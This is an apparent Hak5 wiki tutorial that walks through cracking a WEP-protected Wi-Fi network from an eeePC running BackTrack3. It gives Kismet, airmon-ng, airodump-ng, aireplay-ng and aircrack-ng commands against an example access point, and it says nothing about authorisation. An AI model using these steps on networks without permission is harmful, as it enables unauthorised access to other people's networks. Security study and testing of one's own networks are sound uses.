Eeepc wifi hacking
From Hak5
Contents |
Overview
The eeePC's Atheros wifi card is natively supported by BackTrack3 with madwifi drivers patched for injection. This brief tutorial will explain the steps necessary to perform WEP cracking on the eeePC. Thoroughly explaining WEP cracking concepts is not the intent of this article, though with the specified hardware and software following along should result in successful WEP cracking. For more detailed information the tools used please follow the links in the further reading section below.
Prerequisites
This article assumes a basic knowledge of Linux and is targeted at eeePC users with BackTrack3 either installed or booting from USB/SD.
Before we begin we must know a few things about our host and our target. Start by noting the BSSID of your wireless adapter.
iwconfig
The BSSID of your wireless card will display next to Access Point under ath0. In this example the BSSID is 00:15:af:67:65:00.
Next we need the MAC address of the target. For this we will use the wireless detection program Kismet. While BackTrack3 supports the eeePC's hardware out of the box we must configure Kismet to use the madwifi driver as it's source.
nano -w /usr/local/etc/kismet.conf
Change the source configuration as follows:
source=madwifi_g,wifi0,madwifi #For Atheros
Now we can start Kismet and find the BSSID of our target wireless access point.
Kismet
By default Kismet will display in autofit mode. In order to see more information about each discovered access point we must change view. Press s to bring up the mode selection dialogue and choose a sorting method. I use s to sort by SSID. Next we use the up/down arrows to select the SSID of the target access point and press i for network details. Ensure that encryption type is marked as WEP and note the BSSID. In this example the SSID is "hackme" and the BSSID is 00:09:5B:FF:4F:B6.
Starting the wireless interface in monitor mode
Monitor mode allows wireless interfaces to monitor wireless network traffic without being associated to an access point. While most wireless network cards do not support transmitting in monitor mode the eeePC's Atheros card is fully supported by BackTrack3 with madwifi drivers. Airsnort has a good explanation of the difference between monitor mode and promiscuous mode.
Before we bring the wireless interface up in monitor mode we must stop whatever it may be doing by running
airmon-ng stop ath0
Next we run iwconfig to verify that no wireless extensions are up.
iwconfig
Finally start the wireless card in monitor mode on channel 11 by issuing
airmon-ng start wifi0 11
Capturing IVs
Explain IVs and technology behind WEP encryption/cracking
Start airodump-ng set to capture IVs from our target BSSID and write to file
airodump-ng -c 11 --bssid 00:09:5B:FF:4F:B6 -w output ath0
Fake association with AP
aireplay-ng -1 0 -e hackme -a 00:09:5B:FF:4F:B6 -h 00:15:af:67:65:00 ath0
Start aireplay-ng in ARP request replay mode
aireplay-ng -3 -b 00:09:5B:FF:4F:B6 -h 00:15:af:67:65:00 ath0
Get WEP key
aircrack-ng -z -b 00:09:5B:FF:4F:B6 output*.cap
Further Reading
http://www.aircrack-ng.org/doku.php?id=simple_wep_crack http://www.kismetwireless.net/documentation.shtml http://forums.remote-exploit.org/archive/index.php/t-5876.html http://forum.eeeuser.com/viewtopic.php?id=4229
Thanks
- collaption
- mubix
- negen
- ghaze